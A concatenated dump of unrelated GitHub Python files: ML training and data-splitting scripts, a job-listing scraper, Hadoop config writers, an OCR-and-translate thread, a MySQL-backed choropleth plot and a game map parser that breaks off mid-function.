StandardScaler()\nY_Scaler.fit(Y_train_data)\n\n# Construct the scaled data\nXs_train_data = X_Scaler.transform(X_train_data)\nXs_valid_data = X_Scaler.transform(X_valid_data)\nXs_test_data = X_Scaler.transform(X_test_data)\nYs_train_data = Y_Scaler.transform(Y_train_data)\nYs_valid_data = Y_Scaler.transform(Y_valid_data)\nYs_test_data = Y_Scaler.transform(Y_test_data)\nZs_train_data = Z_Scaler.transform(Z_train_data)\nZs_valid_data = Z_Scaler.transform(Z_valid_data)\nZs_test_data = Z_Scaler.transform(Z_test_data)\n\n\n# Import the tensorflow session\nsess = tf.InteractiveSession()\nrun_folder_name = 'System_' + str(delay_embedded_system_no) + '/MyMac/RUN_' + str(RUN_NO)\ndict_model = get_dict_param(run_folder_name, delay_embedded_system_no, sess)\n\n# # Load the hyperparameters for each run\n# with open(run_folder_name_i + '/dict_hyperparameters.pickle', 'rb') as handle:\n# dict_run_i_info = pickle.load(handle)\n\n# Lift the data to construct psiZ\npsiZ_train = dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_train_data})\npsiZ_valid = dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_valid_data})\npsiZ_test = dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_test_data})\npsiZdim = psiZ_train.shape[1]\n\n# Define the autoencoder training parameters\nn_hidden_layers = 2\nn_nodes = psiZdim\n\n\nDEVICE_NAME = '/cpu:0'\nn_embedded_state_dimension = Xdim\nkeep_prob = 1\nactivation_flag = 1\nres_net = 0\nls_dict_training_params = []\nls_dict_training_params.append({'step_size': 0.5, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.3, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.1, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.05, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.03, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.01, 'max_epochs':50000})\nenc_hidden_vars_list = [n_nodes] * n_hidden_layers\nenc_hidden_vars_list.append(n_embedded_state_dimension)\ndec_hidden_vars_list = [n_nodes] * n_hidden_layers\ndec_hidden_vars_list.append(psiZdim)\n\n# Define and train the autoencoder\n# Neural networks initialized\nenc_Wx_list, enc_bx_list = initialize_Wblist(psiZdim, enc_hidden_vars_list)\ndec_Wx_list, dec_bx_list = initialize_Wblist(n_embedded_state_dimension, dec_hidden_vars_list)\npsiZ_feed = tf.placeholder(tf.float32, shape=[None, psiZdim])\npsiZ_encoded_feed = tf.placeholder(tf.float32, shape=[None, n_embedded_state_dimension])\nX_feed = tf.placeholder(tf.float32, shape=[None, Xdim])\nstep_size = tf.placeholder(tf.float32, shape=[])\n# ENCODER\nenc_z_list = []\nif activation_flag == 1: # RELU\n enc_z_list.append(tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nif activation_flag == 2: # ELU\n enc_z_list.append(tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nif activation_flag == 3: # tanh\n enc_z_list.append(tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nfor k in range(1, len(enc_hidden_vars_list) - 1):\n prev_layer_output = tf.matmul(enc_z_list[k - 1], enc_Wx_list[k]) + enc_bx_list[k]\n if activation_flag == 1: # RELU\n enc_z_list.append(tf.nn.dropout(tf.nn.relu(prev_layer_output), keep_prob))\n if activation_flag == 2: # ELU\n enc_z_list.append(tf.nn.dropout(tf.nn.elu(prev_layer_output), keep_prob))\n if activation_flag == 3: # tanh\n enc_z_list.append(tf.nn.dropout(tf.nn.tanh(prev_layer_output), keep_prob))\npsiZ_encoded = tf.matmul(enc_z_list[-1], enc_Wx_list[-1]) + enc_bx_list[-1]\n# DECODER\ndec_z_list = []\nif activation_flag == 1: # RELU\n dec_z_list.append(tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]),keep_prob)\nif activation_flag == 2: # ELU\n dec_z_list.append(tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob)\nif activation_flag == 3: # tanh\n dec_z_list.append(tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]),keep_prob)\nfor k in range(1, len(dec_hidden_vars_list) - 1):\n prev_layer_output = tf.matmul(dec_z_list[k - 1], dec_Wx_list[k]) + dec_bx_list[k]\n psiZ_decoded_from_encoded = tf.matmul(psiZ_decoded_from_encoded, dec_Wx_list[k]) + dec_bx_list[k]\n if activation_flag == 1: # RELU\n dec_z_list.append(tf.nn.dropout(tf.nn.relu(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.relu(psiZ_decoded_from_encoded), keep_prob)\n if activation_flag == 2: # ELU\n dec_z_list.append(tf.nn.dropout(tf.nn.elu(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.elu(psiZ_decoded_from_encoded), keep_prob)\n if activation_flag == 3: # tanh\n dec_z_list.append(tf.nn.dropout(tf.nn.tanh(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.tanh(psiZ_decoded_from_encoded), keep_prob)\npsiZ_decoded_from_encoded = tf.matmul(psiZ_decoded_from_encoded, dec_Wx_list[-1]) + dec_bx_list[-1]\npsiZ_decoded = tf.matmul(dec_z_list[-1], dec_Wx_list[-1]) + dec_bx_list[-1]\n# Outputs - Yencoded_from_decoded, Y_decoded, Y_encoded\n# OBJECTIVE FUNCTION CONSTRUCTION\ntruth = tf.concat([psiZ_feed, X_feed], axis=1)\nprediction = tf.concat([psiZ_decoded, psiZ_encoded], axis=1)\n# truth = Y_feed\n# prediction = Y_decoded\nSSE = tf.math.reduce_mean(tf.math.square(truth - prediction))\n# SST = tf.math.reduce_sum(tf.math.square(truth - tf.math.reduce_mean(truth,axis=0)))\n# r2 = (1 - tf.divide(SSE, SST)) * 100\n\nloss_fn = SSE\noptimizer = tf.train.AdagradOptimizer(step_size).minimize(loss_fn)\nsess.run(tf.global_variables_initializer())\n# Feed the right data\ndict_fed_training_data = {psiZ_feed: psiZ_train, X_feed: Xs_train_data}\ndict_fed_validation_data = {psiZ_feed: psiZ_valid, X_feed: Xs_valid_data}\n# TRAIN THE NEURAL NET\nprint('Training Error : ', loss_fn.eval(dict_fed_training_data))\nprint('Validation Error : ', loss_fn.eval(dict_fed_validation_data))\nfor dict_training_params in ls_dict_training_params:\n dict_fed_training_data[step_size] = dict_training_params['step_size']\n print('==================================')\n print('Running Step Size :', dict_training_params['step_size'])\n for i in range(dict_training_params['max_epochs']):\n optimizer.run(feed_dict=dict_fed_training_data)\n print('Training Error : ', loss_fn.eval(dict_fed_training_data))\n print('Validation Error : ', loss_fn.eval(dict_fed_validation_data))\n print('X equal accuracy : ', np.max([0, 100 * r2_score(X_train_data, X_Scaler.inverse_transform(psiZ_encoded.eval({psiZ_feed: psiZ_train})))]))\n psiZ_est = psiZ_decoded.eval({psiZ_feed: psiZ_train})\n # print('psiZ reconstruction accuracy : ', np.max([0, 100 * r2_score(psiZ_train, psiZ_est)]))\n print('Z reconstruction accuracy : ', np.max([0, 100 * r2_score(Z_train_data, Z_Scaler.inverse_transform(psiZ_est[:,0:Zdim]) )]))\n\n## Save the run\ndict_dump = {}\ndict_dump['system_no'] = delay_embedded_system_no\ndict_dump['n_delay_embedding'] = np.int(np.mod(delay_embedded_system_no,10))\ndict_dump['run_no'] = RUN_NO\n# All scalers\ndict_dump['XT_Scaler'] = X_Scaler\ndict_dump['YT_Scaler'] = Y_Scaler\ndict_dump['ZT_Scaler'] = Z_Scaler\n\nsaver_i = tf.compat.v1.train.Saver()\n# Feed Variables\ntf.compat.v1.add_to_collection('XT_feed', X_feed)\ntf.compat.v1.add_to_collection('psiZT_feed', psiZ_feed)\ntf.compat.v1.add_to_collection('psiZT_encoded_feed', psiZ_encoded_feed)\n# Evaluation Variables\ntf.compat.v1.add_to_collection('psiZT_decoded_from_encoded', psiZ_decoded_from_encoded)\ntf.compat.v1.add_to_collection('psiZT_decoded', psiZ_decoded)\ntf.compat.v1.add_to_collection('psiZT_encoded', psiZ_encoded)\n\nstorage_folder = 'AutoEncoder_Decoder/System_' + str(np.int(np.floor(delay_embedded_system_no/10)*10))\nif not os.path.exists(storage_folder):\n if not os.path.exists('AutoEncoder_Decoder'):\n os.mkdir('AutoEncoder_Decoder')\n os.mkdir(storage_folder)\nsaver_path_curr = saver_i.save(sess, storage_folder + '/autoenc_dec' + str() + '.ckpt')\nwith open(storage_folder + '/key_details.pickle', 'wb') as handle:\n pickle.dump(dict_dump, handle)\n","repo_name":"raghawardhan585/TS_AR_IFFL","sub_path":"Autoencoder_Decoder_Learning.py","file_name":"Autoencoder_Decoder_Learning.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8017209639","text":"\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport random\n\nclasses_path = glob.glob('/raid/yuanyong/neuralcode/ncdata/*')\ntrain_samples = []\nval_samples = []\n\nimgs_total = 0\n\nfor i, class_path in enumerate(classes_path):\n class_ = class_path.split('/')[-1]\n imgs_path = glob.glob(class_path + '//*')\n num_imgs = len(imgs_path)\n num_train = int(num_imgs*0.6)\n num_val = num_imgs - num_train\n\n np.random.seed(1024)\n sample_idx = np.random.choice(range(num_imgs), num_imgs, replace=False)\n train_idx = sample_idx[0:num_train]\n val_idx = sample_idx[num_train:]\n\n for idx_ in train_idx:\n img_path = imgs_path[idx_]\n train_samples.append(img_path + ' ' + class_ + '\\n')\n\n for idx_ in val_idx:\n img_path = imgs_path[idx_]\n val_samples.append(img_path + ' ' + class_ + '\\n')\n\n imgs_total += num_imgs\n\n\nrandom.shuffle(train_samples)\nrandom.shuffle(val_samples)\n\nwith open('lmdb/train.txt', 'w') as f_train, open('lmdb/val.txt', 'w') as f_val:\n for sample in train_samples:\n f_train.write(sample)\n for sample in val_samples:\n f_val.write(sample)\n","repo_name":"willard-yuan/mykit","sub_path":"python/dl/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30057425974","text":"import random as rand\nimport csv\nmovies = []\ngenres = []\nserial = 0\n#opens the list of movies and saves in movies[]\nwith open(\"movies.csv\") as list:\n\tfor movie in list:\n\t\tmovie = movie.lower()\t\n\t\tmovies.append(movie)\ntotal_movies = len(movies)\n\nwith open(\"genres.csv\") as list:\n\tfor genre in list:\n\t\tgenre = genre.lower()\n\t\tgenres.append(genre)\ntotal_genres = len(genres)\n\n#randomly chooses films\nfor i in range(1000):\n\tindex = (rand.randrange(1000) % total_movies)\n\tg1 = (rand.randrange(1000) % total_genres)\n\tg2 = (rand.randrange(1000) % total_genres)\n\tg3 = (rand.randrange(1000) % total_genres)\n\n\tgenre1 = genres[g1].strip()\n\tgenre2 = genres[g2].strip()\n\tgenre3 = genres[g3].strip()\n\tserial += 1\n\tmovie = movies[index].strip()\n\t#print(f\"{serial},{movie},{genre1} {genre2} {genre3}\\n\")\n\t#saves in file\n\twith open(\"moviedata.csv\", mode=\"a\") as file:\n\t\tfile.write(f'{serial},{movie},{genre1} {genre2} {genre3}\\n')\n","repo_name":"1basilisk/Python","sub_path":"sql/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9955938461","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport xlwt\r\n\r\nbook=xlwt.Workbook(encoding='utf-8',style_compression=0)\r\nsheet=book.add_sheet('实习僧',cell_overwrite_ok=True)\r\nsheet.write(0,0,'名称')\r\nsheet.write(0,1,'公司')\r\nsheet.write(0,2,'工资')\r\nsheet.write(0,3,'关键词')\r\nsheet.write(0,4,'城市')\r\nn=1\r\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0\"}\r\ndef job_url():\r\n for i in range(1, 14):\r\n req = requests.get(\r\n f'https://www.shixiseng.com/interns?page={i}&keyword=python&type=intern&area=&months=&days=°ree=&official=&enterprise=&salary=-0&publishTime=&sortType=&city=%E5%85%A8%E5%9B%BD&internExtend=',\r\n headers=headers)\r\n html = req.text\r\n soup = BeautifulSoup(html, 'lxml')\r\n offers = soup.select('.intern-wrap.intern-item')\r\n for offer in offers:\r\n url = offer.select(\" .f-l.intern-detail__job a\")[0]['href']\r\n #detail_url(url)\r\n html = requests.get(url, headers=headers).text\r\n soup = BeautifulSoup(html, 'lxml')\r\n title = soup.title.text\r\n job = title.split(\"招聘\")[0]\r\n company_name = soup.select('.com_intro .com-name')[0].text.strip()\r\n #key_word=soup.select()\r\n key_word=soup.select(\".com-detail div\")[0].text.strip()\r\n city=soup.select(\".job_position\")[0].text.strip()\r\n salary = soup.select(\".job_money.cutom_font\")[0].text.encode(\"utf-8\")\r\n salary = salary.replace(b'\\xef\\x9a\\x8d', b\"0\")\r\n salary = salary.replace(b'\\xee\\x99\\xb1', b\"1\")\r\n salary = salary.replace(b'\\xef\\x9c\\x86', b\"2\")\r\n salary = salary.replace(b'\\xef\\x9b\\x8d', b\"3\")\r\n salary = salary.replace(b'\\xee\\x8d\\x8a', b\"4\")\r\n salary = salary.replace(b'\\xee\\xb6\\xaa', b\"5\")\r\n salary = salary.replace(b'\\xee\\xb4\\xac', b\"6\")\r\n salary = salary.replace(b'\\xee\\x94\\x9d', b\"7\")\r\n salary = salary.replace(b'\\xef\\x9c\\xb0', b\"8\")\r\n salary = salary.replace(b'\\xef\\x86\\xbf', b\"9\")\r\n salary = salary.decode()\r\n #print(\"工作职位的名称为:{}\\n薪金为:{}\\n招聘公司的名称为:{}\\n\".format(job, salary, company_name))\r\n print(\"爬取\")\r\n global n\r\n sheet.write(n, 0, job)\r\n sheet.write(n, 1, company_name)\r\n sheet.write(n, 2, salary)\r\n sheet.write(n, 3, key_word)\r\n sheet.write(n, 4, city)\r\n n = n + 1\r\ndef main():\r\n job_url()\r\nif __name__ == '__main__':\r\n main()\r\n book.save(u'实习僧3.xlsx')\r\n","repo_name":"Luna1inai/Python","sub_path":"sxs/sxsfinal.py","file_name":"sxsfinal.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29832480170","text":"#!/usr/bin/env python2.7\n#@author Vipin Kumar\n\nimport properties\nimport os\n\n\nclass CONFIG(object):\n\n def factory(type):\n if type == \"HADOOP\":\n return HADOOP_CONFIG()\n if type == \"HBASE\":\n return HBASE_CONFIG()\n if type == \"ZOOKEEPER\":\n return ZOOKEEPER_CONFIG()\n if type == \"HIVE\":\n return HIVE_CONFIG()\n assert 0, \"Bad config type\" + type\n factory = staticmethod(factory)\n\n def appendEnv(self, prop, text):\n print (\"written\")\n with open(\"%s\" % prop, \"a\") as envFile:\n envFile.write(text)\n return True\n\n def writeConfig(self, configFile, text):\n with open(\"%s\" % configFile, \"w\") as confFile:\n confFile.write(text)\n return True\n\n\nclass HADOOP_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HADOOP_CONFIG.instance:\n super(HADOOP_CONFIG, self).__init__()\n else:\n HADOOP_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"HADOOP_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hadoop ENV variables---------\\n\"\n for key in properties.HADOOP_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HADOOP_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass HBASE_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HBASE_CONFIG.instance:\n super(HBASE_CONFIG, self).__init__()\n else:\n HBASE_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"HBASE_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hbase ENV variables---------\\n\"\n for key in properties.HBASE_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HBASE_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass ZOOKEEPER_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not ZOOKEEPER_CONFIG.instance:\n super(ZOOKEEPER_CONFIG, self).__init__()\n else:\n ZOOKEEPER_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"ZOOKEEPER_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------zookeeper ENV variables---------\\n\"\n for key in properties.ZOOKEEPER_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.ZOOKEEPER_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass HIVE_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HIVE_CONFIG.instance:\n super(HIVE_CONFIG, self).__init__()\n else:\n HIVE_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"HIVE_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hbase ENV variables---------\\n\"\n for key in properties.HIVE_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HIVE_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n","repo_name":"vipinkumar7/Gondor","sub_path":"gondor-agents/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11365842686","text":"from threading import Thread\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5 import QtCore\nimport cv2\nfrom PIL import Image\nimport pytesseract\nimport requests\n\nclass BackThread (QObject, Thread):\n process_img = pyqtSignal(str)\n translate_txt = pyqtSignal(str)\n \n\n def __init__(self,parent=None):\n super(BackThread, self).__init__(parent)\n self.isDone=False\n self.img=''\n self.scannedTxt=\"\"\n self.translatedTxt=\"\"\n \n\n def processImg(self ):\n print(\"processImg\")\n if self.img != '':\n img =cv2.imread(self.img)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n gray = cv2.medianBlur(gray, 3)\n self.scannedTxt = pytesseract.image_to_string(gray)\n self.process_img.emit(self.scannedTxt)\n self.translateText()\n print(\"sc \"+self.scannedTxt)\n \n def translateText(self ):\n print(\"translateText\")\n content = {\"name\":self.scannedTxt}\n r = requests.get(\"https://script.google.com/macros/s/AKfycbyXcCEGICNYUj5Pch1ZQxEnR2E7YBWZ_eVlgSlaUouTdf_XIf0s/exec\",verify=True, params=content)\n text=r.text\n str_sucess='(\"Success\")'\n self.translatedTxt=text\n print(\"tr \"+self.translatedTxt)\n if str_sucess in text:\n print (\"found\")\n self.translatedTxt=text.replace(str_sucess, '')\n self.translate_txt.emit(self.translatedTxt)\n \n \n def run(self):\n print(\"running\")\n while True:\n if self.img != '':\n print(\"not none\")\n self.processImg()\n self.translateText()\n self.img = ''\n","repo_name":"nohadrweesh/Scanner-and-Translator","sub_path":"BackThread.py","file_name":"BackThread.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29935692723","text":"import os\r\nimport numpy as np\r\nimport cv2\r\nfrom tqdm import tqdm\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef see():\r\n # # 检测结果可视化\r\n test_dir = '/MyTest/test_imgs'\r\n det_dir = '/MyTest/det_res'\r\n det_vis_dir = '/MyTest/det_vis_test'\r\n\r\n os.makedirs(det_vis_dir, exist_ok=True)\r\n label_files = os.listdir(det_dir)\r\n cnt = 0\r\n plt.figure(figsize=(60, 60))\r\n for label_file in tqdm(label_files):\r\n if not label_file.endswith('.txt'):\r\n continue\r\n image = cv2.imread(os.path.join(test_dir, label_file.replace('det_res_', '')[:-4] + '.jpg'))\r\n\r\n with open(os.path.join(det_dir, label_file), 'r') as f:\r\n lines = f.readlines()\r\n\r\n save_name = label_file.replace('det_res_', '')[:-4] + '.jpg'\r\n if len(lines) == 0:\r\n cv2.imwrite(os.path.join(det_vis_dir, save_name), image)\r\n else:\r\n line = lines[0].strip().split(',')\r\n locs = [float(t) for t in line[:8]]\r\n\r\n # draw box\r\n locs = np.array(locs).reshape(1, -1, 2).astype(np.int32)\r\n image = cv2.imread(\r\n os.path.join(test_dir, label_file.replace('det_res_', '')[:-4] + '.jpg'))\r\n cv2.polylines(image, locs, True, (255, 255, 0), 8) # OpenCV使用BGR格式,8代表线条的粗细\r\n\r\n # save images\r\n save_name = label_file.replace('det_res_', '')[:-4] + '.jpg'\r\n cv2.imwrite(os.path.join(det_vis_dir, save_name), image)\r\n\r\n if cnt < 5: # 只画5张\r\n plt.subplot(151 + cnt)\r\n plt.title(save_name, fontdict={'size': 60})\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.imshow(image)\r\n plt.show()\r\n cnt += 1\r\n","repo_name":"Innocent-children/Water_meter_identification","sub_path":"water_meter_rec/see_det_result.py","file_name":"see_det_result.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39030095897","text":"#Muammer Tunahan Yildiz | 27968\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\n\r\n# Establish a connection to the database\r\ndef connect_to_database():\r\n try:\r\n connection = mysql.connector.connect(\r\n host='localhost',\r\n user='root',\r\n password='tunahan291',\r\n database='deaths'\r\n )\r\n print(\"Connected to the database!\")\r\n return connection\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed to connect to the database: {}\".format(error))\r\n return None\r\n\r\n# Close the database connection\r\ndef close_connection(connection):\r\n if connection and connection.is_connected():\r\n connection.close()\r\n print(\"Connection closed.\")\r\n\r\n# Example usage\r\nconnection = connect_to_database()\r\n\r\nif connection:\r\n try:\r\n # Create a cursor object to interact with the database\r\n cursor = connection.cursor()\r\n\r\n # Example query\r\n cursor.execute('''SELECT c.countries_name, c.iso_code, env.unsafe_water + env.unsafe_sanitation + env.hand_washing AS total_sanitation\r\nFROM countries c\r\nJOIN env_factor env ON c.iso_code = env.iso_code;\r\n ''')\r\n rows = cursor.fetchall()\r\n\r\n # Convert query result into a DataFrame\r\n columns = [column[0] for column in cursor.description]\r\n df = pd.DataFrame(rows, columns=columns)\r\n\r\n # Close the cursor\r\n cursor.close()\r\n\r\n\r\n print(df.head(5))\r\n \r\n fig = go.Figure(data=go.Choropleth(\r\n locations = df['iso_code'],\r\n z = df['total_sanitation'],\r\n text = df['countries_name'],\r\n colorscale = 'Inferno',\r\n autocolorscale=False,\r\n reversescale=True,\r\n marker_line_color='darkgray',\r\n marker_line_width=0.5,\r\n colorbar_title = 'Deaths/Year',\r\n zmax=100000,\r\n zmin=0\r\n \r\n ))\r\n fig.update_layout(\r\n width=1000,\r\n height=620,\r\n geo=dict(\r\n showframe=False,\r\n showcoastlines=False,\r\n projection_type='equirectangular'\r\n ),\r\n title={\r\n 'text': '<b>Deaths Caused By Unaccessible Clean Water Sources</b>',\r\n 'y':0.9,\r\n 'x':0.5,\r\n 'xanchor': 'center',\r\n 'yanchor': 'top',\r\n },\r\n title_font_color='#525252',\r\n title_font_size=26,\r\n font=dict(\r\n family='Heebo', \r\n size=18, \r\n color='#525252'\r\n )\r\n )\r\n fig.show()\r\n \r\n except mysql.connector.Error as error:\r\n print(\"Error executing query: {}\".format(error))\r\n\r\n finally:\r\n # Close the connection\r\n close_connection(connection)\r\n\r\n","repo_name":"kaanakcay/CS306-Project","sub_path":"STEP 4/map_graph.py","file_name":"map_graph.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24391032503","text":"from settings import *\nfrom entity.doors import Doors\nfrom entity.cube import Cube\nfrom entity.button import Button\nfrom entity.laser import Laser\nfrom entity.receiver import Receiver\nfrom draw import floor_blit\nfrom settings import textures_id\nfrom defs import textures_load\n\ndef map(X, Y):\n y = []\n x = []\n for i in range(0, Y):\n y.append(0)\n for t in range(0, X):\n x.append(y.copy())\n return x\n\n\ndef scan(text_map, textures):\n m = -1\n spawn_pos = 0, 0\n end_pos = 0, 0\n r = 0\n f = text_map.readlines()\n for j in range(0, len(f)):\n if f[j] == '@\\n':\n if f[j + 1] == 'size =\\n':\n size = (int(f[j + 2]), int(f[j + 3]))\n if f[j + 1] == 'jump =\\n':\n jump = int(f[j + 2])\n direction = 0 if f[j + 3] == 'x\\n' else 1\n if f[j] == '@s\\n':\n r = j\n break\n cubes = []\n doors = []\n buttons = []\n lasers = []\n receivers = []\n world_map1 = map(size[0], size[1])\n world_map2 = map(size[0], size[1])\n world_map3 = map(size[0], size[1])\n events = []\n for j in range(r, len(f)):\n if f[j] == '@1\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n world_map1[i][m] = char\n if char == 'S':\n spawn_pos = (i * TILE_x + TILE_x / 2, m * TILE_y + TILE_y / 2)\n if char == 'E':\n end_pos = (i, m)\n if f[j] == '@2\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n if char == 'L':\n lasers.append(Laser((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'l':\n lasers.append(Laser((i,m), reverse=True))\n world_map2[i][m] = ' '\n continue\n if char == 'D':\n doors.append(Doors((i, m), 0))\n world_map2[i][m] = ' '\n continue\n if char == 'd':\n doors.append(Doors((i, m), 0, reverse=True))\n world_map2[i][m] = ' '\n continue\n if char == 'K':\n cubes.append(Cube((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'E':\n cubes.append(Cube((i,m), laser=True))\n world_map2[i][m] = ' '\n continue\n if char == 'Q':\n cubes.append(Cube((i,m), quant=True))\n world_map2[i][m] = ' '\n continue\n if char == 'B':\n buttons.append(Button((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'R':\n receivers.append(Receiver((i,m)))\n world_map2[i][m] = char\n if char == 'q':\n cubes.append(Cube((i,m), quant=True, laser=True))\n world_map2[i][m] = ' '\n continue\n if f[j] == '@3\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n world_map3[i][m] = char\n if f[j] == '@4\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n if char == 'b':\n events.append((i, m, char))\n continue\n if not ((char == '0') or (char == ' ')):\n events.append((i,m,int(char)))\n for door in doors:\n x = door.x\n y = door.y\n if (world_map2[x + 1][y] in stop_blocks) and (world_map2[x - 1][y] in stop_blocks):\n door.direction = 0\n if (world_map2[x][y + 1] in stop_blocks) and (world_map2[x][y - 1] in stop_blocks):\n door.direction = 1\n door.directions()\n for event in events:\n if event[2] != 0:\n if x == event[0] and y == event[1]:\n door.event_id = event[2]\n door.can_open = False\n\n for button in buttons:\n for event in events:\n if button.pos[0] == event[0] and button.pos[1] == event[1]:\n button.event_id = event[2]\n\n for laser in lasers:\n for event in events:\n if laser.pos[0] == event[0] and laser.pos[1] == event[1]:\n laser.event_id = event[2]\n\n for receiver in receivers:\n for event in events:\n if receiver.pos[0] == event[0] and receiver.pos[1] == event[1]:\n receiver.event_id = event[2]\n\n event_link = []\n for door in doors:\n if door.event_id in [0, 'b']:\n continue\n for button in buttons:\n if button.event_id in [0, 'b']:\n continue\n if door.event_id == button.event_id:\n event_link.append((door, button))\n for receiver in receivers:\n if receiver.event_id in [0, 'b']:\n continue\n if door.event_id == receiver.event_id:\n event_link.append((door, receiver))\n\n 